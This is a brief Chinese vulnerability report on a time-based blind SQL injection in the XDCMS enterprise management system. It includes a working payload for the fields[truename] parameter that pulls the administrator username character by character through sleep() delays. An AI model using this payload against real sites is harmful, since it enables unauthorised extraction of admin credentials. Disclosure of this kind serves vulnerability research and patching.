XDCMS企业管理系统SQL #3

文章目录

漏洞作者: roker

只是 safe_html gpc关闭或者php高版本的话,单引号还是可以进去的。 过滤了很多,加上是 updata 。所以盲注延时。

修改抓包修改

fields%5Btruename%5D=a’ or if(ascii(substr((select username from c_admin),1,1))-96,sleep(2),null) or ‘1

延时是成功的

01144326082a9ab8af296c178599f6a363ad346c

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录